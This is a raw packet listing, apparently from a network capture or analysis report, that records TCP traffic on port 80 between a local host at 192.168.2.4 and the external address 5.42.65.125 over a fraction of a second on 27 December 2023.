Dec 27, 2023 18:12:24.743347883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.743366957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.743393898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.748017073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.748027086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.748064041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.748086929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.748131037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.748133898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.748145103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.748155117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.748176098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.748224020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.748234987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.748270988 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.748512030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.748550892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.748595953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.748608112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.748619080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.748647928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.748666048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.748676062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.748686075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.748696089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.748697042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.748717070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.749102116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.749191999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.749228954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.749306917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.749317884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.749327898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.749339104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.749345064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.749347925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.749356985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.749358892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.749380112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.750039101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.750050068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.750087023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.750149965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.750160933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.750171900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.750180960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.750181913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.750190973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.750201941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.750206947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.750231028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.750967026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.750977993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.750988007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.750998020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.751008987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.751010895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.751041889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.751060009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.751070976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.751080990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.751092911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.751781940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.751792908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.751830101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.751878023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.751890898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.751905918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.751916885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.751921892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.751949072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.752434969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.752481937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.752491951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.752502918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.752512932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.752531052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.752585888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.752597094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.752607107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.752615929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.752616882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.752635002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.753388882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.753402948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.753412962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.753424883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.753439903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.753473043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.754611969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.754625082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.754636049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.754662037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.754664898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.754688025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.754703045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.754729033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.754731894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.754785061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.754796982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.754829884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.755455017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.755466938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.755477905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.755490065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.755511999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.755798101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.755810022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.755827904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.755918980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.755930901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.755942106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.755949974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.755953074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.755964994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.755970001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.755975008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.755997896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.756714106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.756731987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.756742954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.756753922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.756759882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.756764889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.756774902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.756778955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.756786108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.756797075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.756808996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.756827116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.757590055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.757602930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.757613897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.757626057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.757637024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.757644892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.757663012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.757704973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.757716894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.757728100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.757746935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.758467913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.758480072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.758512020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.758634090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.758646011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.758671045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.758701086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.758712053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.758723021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.758732080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.758733034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.758744955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.758753061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.758754969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.758775949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.759799957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.759813070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.759841919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.759859085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.759897947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.759910107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.759922028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.759932995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.759952068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.760562897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.760572910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.760590076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.760601997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.760602951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.760727882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.760751009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.760762930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.760828972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.760839939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.760864019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.760905027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.762037039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.762049913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.762089014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.762141943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.762145996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.762154102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.762175083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.763312101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.763375044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.763386965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.763398886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.763434887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.763457060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.763475895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.763506889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.763542891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.763700008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.763710976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.763734102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.764739990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.764751911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.764761925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.764774084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.764781952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.764810085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.767096043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.767107964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.767118931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.767129898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.767154932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.767184973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.769572020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.769586086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.769604921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.769625902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.769655943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.769656897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.769804001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.769815922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.769850969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.769903898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.769916058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.769943953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.770251036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.770279884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.770292044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.770292044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.770333052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.770353079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.770364046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.770375013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.770385981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.770391941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.770397902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.770420074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.773926973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.773940086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.773967981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.774029970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.774040937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.774061918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.774161100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.774193048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.774207115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.775758982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.775839090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.775873899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.775877953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.775885105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.775909901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.775924921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.776016951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.776029110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.776038885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.776050091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.776057959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.776060104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.776070118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.776078939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.776087999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.776108980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.777630091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.777698040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.777709007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.777719975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.777734995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.777858019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.777936935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.777955055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.777973890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.777997971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.778022051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.778033018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.778043032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.778063059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.785883904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.785918951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.785929918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.785939932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.785973072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.786128044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.786164999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.786220074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.786231995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.786242008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.786251068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.786261082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.786261082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.786271095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.786273956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.786282063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.786310911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.793382883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.793396950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.793448925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.793534040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.793576002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.793582916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.793587923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.793659925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.793673038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.793683052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.793695927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.793706894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.793720007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.793747902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.794383049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.794395924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.794406891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.794473886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.794487000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.794497013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.794507980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.794521093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.794948101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.795224905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.795237064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.795281887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.795377970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.795391083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.795402050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.795418978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.795432091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.796144962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.796158075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.796196938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.796207905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.796219110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.796231031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.796272039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.796283960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.797019958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.797030926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.797043085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.797054052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.797082901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.797095060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.797127962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.797139883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.797950029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.797960043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.797970057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.797980070 CET	80	49738	5.42.65.125	192.168.2.4
